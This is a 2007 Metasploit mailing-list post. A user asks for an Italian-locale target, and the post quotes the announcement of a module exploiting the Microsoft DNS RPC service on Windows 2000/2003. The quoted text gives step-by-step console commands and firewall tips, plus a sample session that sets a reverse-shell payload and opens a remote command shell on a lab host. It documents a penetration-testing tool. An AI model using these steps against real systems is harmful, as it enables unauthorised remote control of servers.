[framework] Exploiting the Microsoft DNS RPC service

Giorgio Casali giorgio.casali at gmail.com
Tue Apr 17 10:11:55 CDT 2007 

Hi,
is it possible to have it for the Italian version?
Thanks

2007/4/16, H D Moore <hdm at metasploit.com>:
>
> The exploit module has been merged to stable, use 'Online Update' or 'svn
> update' to grab it. The module's default target will exploit Windows 2000
> SP0-SP4 and Windows 2003 SP0-SP2.
>
> All targets are designed for the English locale. If you have a non-English
> system, submit targets.
>
> The Windows 2003 SP0 target may not be reliable.
>
> The Windows 2003 SP1-SP2 targets will only work if hardware DEP is not in
> use. We use the SEH overwrite method for all targets and the /GS stack
> prevention means we will not be able to use standard hardware DEP bypass
> techniques (return to NTDLL to disable NX).
>
> The RPORT option defaults to '0' and will contact the endpoint mapper of
> the target system in order to determine the real RPC port at runtime.
> This saves a step, but it does mean that one of port 135 or 593 needs to
> be accessible on the target. If you are attacking a system with only
> ports > 1025 allowed through the firewall, you will need to locate the
> RPC service and set RPORT manually.
>
> To use the module, open the console interface, and run:
> msf> use exploit/windows/dcerpc/msdns_zonename
> msf exploit(msdns_zonename) >
> msf exploit(msdns_zonename) > set PAYLOAD <your favorite payload>
> msf exploit(msdns_zonename) > set <payload options>
> msf exploit(msdns_zonename) > set RHOST <target>
> msf exploit(msdns_zonename) > exploit
>
> -- example --
>
> < metasploit >
> ------------
>        \   ,__,
>         \  (oo)____
>            (__)    )\
>               ||--|| *
>
>
>        =[ msf v3.0
> + -- --=[ 184 exploits - 104 payloads
> + -- --=[ 17 encoders - 5 nops
>        =[ 33 aux
>
> msf > use exploit/windows/dcerpc/msdns_zonename
> msf exploit(msdns_zonename) > set PAYLOAD windows/shell_reverse_tcp
> PAYLOAD => windows/shell_reverse_tcp
> msf exploit(msdns_zonename) > set LHOST 192.168.0.127
> LHOST => 192.168.0.127
> msf exploit(msdns_zonename) > set LPORT 4444
> LPORT => 4444
> msf exploit(msdns_zonename) > set RHOST 172.16.233.128
> RHOST => 172.16.233.128
>
> msf exploit(msdns_zonename) > exploit
> [*] Started reverse handler
> [*] Connecting to the endpoint mapper service...
> [*] Discovered Microsoft DNS Server RPC service on port 1356
> [*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English...
> [*] Binding to
> 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128
> [0] ...
> [*] Bound to
> 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128
> [0] ...
> [*] Sending exploit...
> [*] Error: no response from dcerpc service
> [*] Command shell session 1 opened (192.168.0.127:4444 ->
> 192.168.0.127:45196)
>
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-2000 Microsoft Corp.
>
> c:\>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://spool.metasploit.com/pipermail/framework/attachments/20070417/63720aef/attachment.htm

More information about the framework mailing list